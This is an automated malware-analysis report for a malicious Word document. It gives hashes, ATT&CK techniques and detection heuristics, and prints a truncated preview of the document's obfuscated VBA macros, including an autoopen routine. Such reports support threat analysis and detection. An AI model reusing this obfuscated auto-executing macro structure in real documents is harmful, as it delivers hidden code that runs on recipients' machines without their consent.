Office (OLE) malware analysis — malicious · f62e2bb27a4274db

MALICIOUS

Office (OLE)

154.9 KB Created: 2019-04-08 13:35:00 Authoring application: Microsoft Office Word First seen: 2019-08-04

MD5: 3d0b1fcf68e2af6708f2e7c45d2f1990 SHA-1: 97eec26627ee6307753097fde17c15f084fbc2f1 SHA-256: f62e2bb27a4274db03c1760f3ccf58da7d8af6e63157e7b4e7fd02d346c54464

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is a malicious Office document containing obfuscated VBA macros. The presence of AutoOpen and GetObject calls, along with the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic, indicates that the macro is designed to execute automatically upon opening. The obfuscated nature of the script suggests it is likely a downloader for a second-stage payload.

Heuristics 7

ClamAV: Doc.Malware.00536d-6934200-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.00536d-6934200-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 46224 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	46224 bytes
SHA-256: `5c4e1ec85368a80b4d6e612339ba3aa95e19b8e18f116051d456e4450cf250e8`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "mAACBDCw" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "oAQXUQ_Q" Attribute VB_Base = "0{2169CF3F-0B53-4BB2-8E1F-875C14052734}{63A5F89F-BD0E-423F-9659-BF043C9837C0}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "lkAwckQk" Attribute VB_Base = "0{FC817B6C-9041-4CC9-803E-4B25CAB02895}{29686D0B-93B4-40F6-83E1-34574A0CF500}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "CABxAA" Function vA1UAA() If FAGGBB = 313372695 Then Select Case hCAAcAZx Case 121232854 Day _ CInt(965307846) Day CStr(nQBQA_ _ * 496390280 / 402171650 + Log(jBDDxw)) Day 251088079 Case 265310072 Day 235799612 Day _ Atn(652598903) Day Cos(oAQk_BA + _ CSng(uA1ABwwX)) End Select If IBkcA1 Xor QAAkDAoG Then Day _ Hex(618810825) End If End If If W1AAAA = 665193236 Then Select Case VAAxA4X Case 342241516 Day _ CInt(932472039) Day CStr(uXUAAA _ * 350887855 / 488765424 + Log(UwAQ_4A)) Day 142209313 Case 775872963 Day 879494183 Day _ Atn(466367803) Day Cos(l1AADUA + _ CSng(VUXBABA)) End Select If pBBUAAwQ Xor AACAQAAw Then Day _ Hex(273447048) End If End If If hoBBAAcc = 731342693 Then Select Case KcAABA Case 715134354 Day _ CInt(459955011) Day CStr(dACU1_AB _ * 468436249 / 647590869 + Log(pUABA1)) Day 517255060 Case 65274343 Day 413293965 Day _ Atn(740998275) Day Cos(ocUAAcAU + _ CSng(jZAkABkA)) End Select If AoAAxG Xor nAGUQDA_ Then Day _ Hex(428501370) End If End If End Function Sub autoopen() jBCQGQB End Sub Function UUAkZAXU() If TCAAAC = 950982557 Then Select Case IwQCADA Case 108145216 Day _ CInt(138950586) Day CStr(oAQZ_kZB _ * 517580962 / 519418361 + Log(jBwUUk)) Day 363422676 Case 261578212 Day 772654062 Day _ Atn(312564739) Day Cos(mBoCAZ + _ CSng(f1ZACAAU)) End Select If dAxUAxAo Xor cAXACA Then Day _ Hex(684739659) End If End If If MD11QB = 904048746 Then Select Case CAACGCxA Case 757807086 Day _ CInt(64329881) Day CStr(m_QAADAA _ * 164761185 / 447245792 + Log(MADAAAk)) Day 146252445 Case 172019570 Day 49619077 Day _ Atn(245912927) Day Cos(TBA4QB + _ CSng(KBAD4__A)) End Select If joZAUQoG Xor mBAcXA Then Day _ Hex(870647504) End If End If If oB1U1UA4 = 962010802 Then Select Case uAcxUxX Case 986015555 Day _ CInt(100819250) Day CStr(Y4AAUAA _ * 338029331 / 114436963 + Log(LGDDcB)) Day 893329690 Case 963468270 Day 563381152 Day _ Atn(201253118) Day Cos(cBDUAUUA + _ CSng(zXQxxQC)) End Select If CCkc_QA_ Xor d4_DAAQx Then Day _ Hex(463838348) End If End If End Function Attribute VB_Name = "nBQAZ_GQ" Function l4QUBABB() If GQADUc = 815072326 Then Select Case wcwoA_ Case 641480310 Day _ CInt(722274944) ... (truncated)

SHA-256: 5c4e1ec85368a80b4d6e612339ba3aa95e19b8e18f116051d456e4450cf250e8

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "mAACBDCw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "oAQXUQ_Q"
Attribute VB_Base = "0{2169CF3F-0B53-4BB2-8E1F-875C14052734}{63A5F89F-BD0E-423F-9659-BF043C9837C0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "lkAwckQk"
Attribute VB_Base = "0{FC817B6C-9041-4CC9-803E-4B25CAB02895}{29686D0B-93B4-40F6-83E1-34574A0CF500}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "CABxAA"
Function vA1UAA()
      If FAGGBB = 313372695 Then
      Select Case hCAAcAZx
         Case 121232854
            Day _
CInt(965307846)
            Day CStr(nQBQA_ _
* 496390280 / 402171650 + Log(jBDDxw))
            Day 251088079
         Case 265310072
            Day 235799612
            Day _
Atn(652598903)
            Day Cos(oAQk_BA + _
CSng(uA1ABwwX))
      End Select
      If IBkcA1 Xor QAAkDAoG Then
         Day _
Hex(618810825)
      End If
   End If
      If W1AAAA = 665193236 Then
      Select Case VAAxA4X
         Case 342241516
            Day _
CInt(932472039)
            Day CStr(uXUAAA _
* 350887855 / 488765424 + Log(UwAQ_4A))
            Day 142209313
         Case 775872963
            Day 879494183
            Day _
Atn(466367803)
            Day Cos(l1AADUA + _
CSng(VUXBABA))
      End Select
      If pBBUAAwQ Xor AACAQAAw Then
         Day _
Hex(273447048)
      End If
   End If
      If hoBBAAcc = 731342693 Then
      Select Case KcAABA
         Case 715134354
            Day _
CInt(459955011)
            Day CStr(dACU1_AB _
* 468436249 / 647590869 + Log(pUABA1))
            Day 517255060
         Case 65274343
            Day 413293965
            Day _
Atn(740998275)
            Day Cos(ocUAAcAU + _
CSng(jZAkABkA))
      End Select
      If AoAAxG Xor nAGUQDA_ Then
         Day _
Hex(428501370)
      End If
   End If
End Function
Sub autoopen()
jBCQGQB
End Sub
Function UUAkZAXU()
      If TCAAAC = 950982557 Then
      Select Case IwQCADA
         Case 108145216
            Day _
CInt(138950586)
            Day CStr(oAQZ_kZB _
* 517580962 / 519418361 + Log(jBwUUk))
            Day 363422676
         Case 261578212
            Day 772654062
            Day _
Atn(312564739)
            Day Cos(mBoCAZ + _
CSng(f1ZACAAU))
      End Select
      If dAxUAxAo Xor cAXACA Then
         Day _
Hex(684739659)
      End If
   End If
      If MD11QB = 904048746 Then
      Select Case CAACGCxA
         Case 757807086
            Day _
CInt(64329881)
            Day CStr(m_QAADAA _
* 164761185 / 447245792 + Log(MADAAAk))
            Day 146252445
         Case 172019570
            Day 49619077
            Day _
Atn(245912927)
            Day Cos(TBA4QB + _
CSng(KBAD4__A))
      End Select
      If joZAUQoG Xor mBAcXA Then
         Day _
Hex(870647504)
      End If
   End If
      If oB1U1UA4 = 962010802 Then
      Select Case uAcxUxX
         Case 986015555
            Day _
CInt(100819250)
            Day CStr(Y4AAUAA _
* 338029331 / 114436963 + Log(LGDDcB))
            Day 893329690
         Case 963468270
            Day 563381152
            Day _
Atn(201253118)
            Day Cos(cBDUAUUA + _
CSng(zXQxxQC))
      End Select
      If CCkc_QA_ Xor d4_DAAQx Then
         Day _
Hex(463838348)
      End If
   End If
End Function


Attribute VB_Name = "nBQAZ_GQ"
Function l4QUBABB()
      If GQADUc = 815072326 Then
      Select Case wcwoA_
         Case 641480310
            Day _
CInt(722274944)
      
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.